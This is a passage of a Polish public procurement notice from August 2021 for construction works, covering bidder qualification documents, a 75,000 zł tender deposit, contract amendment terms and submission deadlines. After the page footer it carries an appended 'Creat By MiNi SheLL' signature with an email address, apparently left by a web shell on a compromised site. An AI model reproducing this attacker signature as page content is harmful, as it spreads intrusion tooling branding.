1117. z późn. zm.)<br/>Zamawiający informuje, iż zgodnie z treścią art. 12 ust. 7 ustawy Prawo budowlane podstawę do<br/>wykonywania samodzielnych funkcji technicznych w budownictwie stanowi wpis, w drodze<br/>decyzji, do centralnego rejestru, o którym mowa w art. 88a ust. 1 pkt 3 lit. a oraz zgodnie z<br/>odrębnymi przepisami, wpis na listę członków właściwej izby samorządu zawodowego,<br/>potwierdzony zaświadczeniem wydanym przez tą izbę, z określonym w nim terminem ważności.<br/>Zamawiający dokona oceny spełniania powyższego warunku w oparciu o podmiotowe środki dowodowe, o których mowa w rozdz. VI ust. 3 pkt 2. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z dyspozycją przepisu art. 273 ust. 1 pkt 1 ustawy Pzp, Zamawiający nie wymaga złożenia w<br/>postępowaniu podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>- w celu potwierdzenia spełniania warunku udziału w postępowaniu, o którym mowa w rozdz. V ust. 1<br/>pkt 1 lit. a).<br/>Wzór wykazu robót budowlanych stanowi załącznik 1D do SWZ.<br/>2. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>- w celu potwierdzenia spełniania warunku udziału w postępowaniu, o którym mowa w rozdz. V ust. 1<br/>pkt 1 lit. b).<br/>Wzór wykazu osób stanowi załącznik 1E do SWZ.<br/>Wymagana forma i moment złożenia: Oryginał w formie elektronicznej, w postaci elektronicznej z<br/>podpisem zaufanym lub osobistym albo kopia w postaci cyfrowego odwzorowania dokumentu<br/>papierowego, poświadczona za zgodność z oryginałem przez wykonawcę podpisem kwalifikowanym,<br/>zaufanym lub osobistym lub przez notariusza podpisem kwalifikowanym.<br/>Dokument składany na wezwanie Zamawiającego.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania, Zamawiający żąda od wykonawcy: Odpisu lub informacji z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru. Wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli zamawiający<br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca<br/>wskazał dane umożliwiające dostęp do tych dokumentów. Wymagana forma i moment złożenia:<br/>oryginał w formie elektronicznej, w postaci elektronicznej z podpisemzaufanym lub osobistym<br/>albo kopia w postaci cyfrowego odwzorowania dokumentu papierowego, poświadczona za<br/>zgodność z oryginałem przez wykonawcę podpisem kwalifikowanym, zaufanym lub osobistym<br/>lub przez notariusza podpisem kwalifikowanym. Dokument składany wraz z ofertą. 2) Jeżeli w<br/>imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z<br/>dokumentów, o których mowa w pkt 1, Zamawiający żąda od wykonawcy złożenia:<br/>Pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania<br/>wykonawcy. Wymóg powyższy ma zastosowanie odpowiednio do osoby działającej w imieniu<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego. Wymagana<br/>forma i moment złożenia: oryginał w formie elektronicznej, w postaci elektronicznej z podpisem<br/>zaufanym lub osobistym albo kopia w postaci cyfrowego odwzorowania dokumentu<br/>papierowego, której zgodność z oryginałem poświadcza mocodawca podpisem kwalifikowanym,<br/>zaufanym lub osobistym lub notariusz podpisem kwalifikowanym. Dokument składany wraz z<br/>ofertą. 3) Zgodnie z dyspozycją przepisu art. 273 ust. 2 ustawy Pzp, wykonawca dołączy do<br/>oferty: Oświadczenie wstępne, o którym mowa w art. 125 ust. 1 w zw. z art. 266 , w celu<br/>potwierdzenia braku podstaw do wykluczenia z postępowania oraz spełniania warunków udziału<br/>w postępowaniu, zgodnie z treścią załącznika nr 1B i 1C do SWZ. Wymagana forma i moment<br/>złożenia: Oryginał w formie elektronicznej (postać elektroniczna z podpisem kwalifikowanym), w<br/>postaci elektronicznej z podpisem zaufanym lub osobistym. Oświadczenia składane wraz z<br/>ofertą. 4) Wykonawca, który polega nazdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, składa wraz z ofertą: Zobowiązanie podmiotu udostępniającego zasoby do oddania mu<br/>do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy<br/>środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wzór pisemnego zobowiązania stanowi załącznik 1F do<br/>SWZ. Wymagana forma i moment złożenia: oryginał w formie elektronicznej, w postaci<br/>elektronicznej zpodpisem zaufanym lub osobistym albo kopia w postaci cyfrowego<br/>odwzorowania dokumentu papierowego, poświadczona za zgodność z oryginałem przez<br/>podmiot udostępniający zasoby podpisem kwalifikowanym, zaufanym lub osobistym lub przez<br/>notariusza podpisem kwalifikowanym. Dokument składany wraz z ofertą (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wysokość wadium. <br/>Oferta winna być zabezpieczona wadium w wysokości: 75 000,00 zł (słownie: siedemdziesiąt pięć tysięcy zł, 00/100),<br/>2.	Forma wniesienia wadium. <br/>Wadium może być wniesione w jednej lub w kilku następujących formach:<br/>1)	w pieniądzu, na rachunek Zamawiającego:<br/>ING Bank Śląski Spółka Akcyjna o/Katowice,<br/>nr rachunku: 29 1050 1214 1000 0022 0331 4816 lub<br/>2)	w formie niepieniężnej, poprzez przekazanie Zamawiającemu oryginału gwarancji lub poręczenia, w postaci elektronicznej w ramach:<br/>a)	gwarancji bankowych lub <br/>b)	gwarancji ubezpieczeniowych lub<br/>c)	poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Moment wniesienia wadium.<br/>Wadium wnosi się przed upływem terminu składania ofert (tj. przed upływem godziny i dnia wyznaczonego, jako ostateczny termin składania ofert) i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, o którym mowa w rozdz. XII ust. 1, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. Za datę wniesienia wadium w pieniądzu (przelewem) uważa się datę uznania rachunku bankowego Zamawiającego. Wadium powinno wpłynąć na rachunek bankowy Zamawiającego do upływu terminu wyznaczonego na składanie ofert (t.j. przed upływem godziny i dnia wyznaczonego, jako ostateczny termin składania ofert). <br/>4.	Wymagania dotyczące wadium wnoszonego w formie niepieniężnej:<br/>1)	z treści gwarancji (poręczenia) powinno w sposób nie budzący wątpliwości wynikać zobowiązanie gwaranta do zapłaty beneficjentowi gwarancji lub poręczenia (Zamawiającemu) należności, w przypadku ziszczenia się któregokolwiek z warunków:<br/>a)	wykonawca (zleceniodawca) w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej;<br/>b)	wykonawca (zleceniodawca), którego oferta została wybrana: <br/>-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, <br/>-	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy (zleceniodawcy), którego oferta została wybrana.<br/>2)	zobowiązanie gwaranta (poręczyciela) powinno być bezwarunkowe, nieodwołalne i płatne na pierwsze żądanie beneficjenta gwarancji lub poręczenia (Zamawiającego);<br/>3)	gwarancja (poręczenie) powinny spełniać wymogi określone we właściwych przepisach. Powyższe warunki muszą wynikać z treści gwarancji lub poręczenia.<br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o którym mowa w ust. 2 pkt 2, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>6.	Wadium a termin związania ofertą.<br/>Wadium, bez względu na sposób jego wniesienia, musi obejmować cały okres związania ofertą, o którym mowa w rozdziale XII SWZ. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>7.	Zasady zwrotu i zatrzymania wadium.<br/>Okoliczności i zasady zwrotu wadium z urzędu oraz na wniosek, zostały opisane w art. 98 ust. 1 pkt 1 – 5 ustawy Pzp. Podstawy oraz tryb zatrzymania wadium określa przepis art. 98 ust. 1 pkt 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) W przypadku Wykonawców wspólnie ubiegających się o zamówienie (np. konsorcja, spółki<br/>cywilne) – winni oni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego; 2) W odniesieniu do warunków dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do<br/>realizacji których te zdolności są wymagane. 3) W wypadkach, o których mowa w pkt 2,<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają w ofercie oświadczenie, z<br/>którego wynika, które roboty budowlane wykonają poszczególni wykonawcy (zgodnie z treścią<br/>formularza oferty – załącznik 1A); 4) w przypadku wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, spełnienie wymogu dotyczącego braku podstaw do wykluczenia,<br/>powinno zostać wykazane przez każdy z tych podmiotów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany postanowień Umowy mogą nastąpić wyłącznie w okolicznościach, o których mowa w<br/>art. 455 ust. 1 i 2 ustawy Pzp i wymagają aneksu w formie pisemnej pod rygorem nieważności.<br/>2. Zamawiający, działając zgodnie z dyspozycją przepisu art. 455 ust. 1 pkt 1 ustawy Pzp może<br/>wyrazić zgodę na dokonanie zmian postanowień zawartej Umowy w stosunku do treści oferty, na<br/>podstawie której dokonano wyboru Wykonawcy w przypadkach określonych w § 14 wzoru<br/>umowy (załącznik nr 3 do SWZ). Klauzule waloryzacyjne zostały określone w § 15 wzoru<br/>umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1) Ofertę przekazuje się w postępowaniu przy użyciu środków komunikacji elektronicznej w rozumieniu art. 68 ustawy Pzp, za pośrednictwem platformazakupowa.pl. 2) Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/us do upływu terminu składania ofert.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-20 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-18</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-05 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com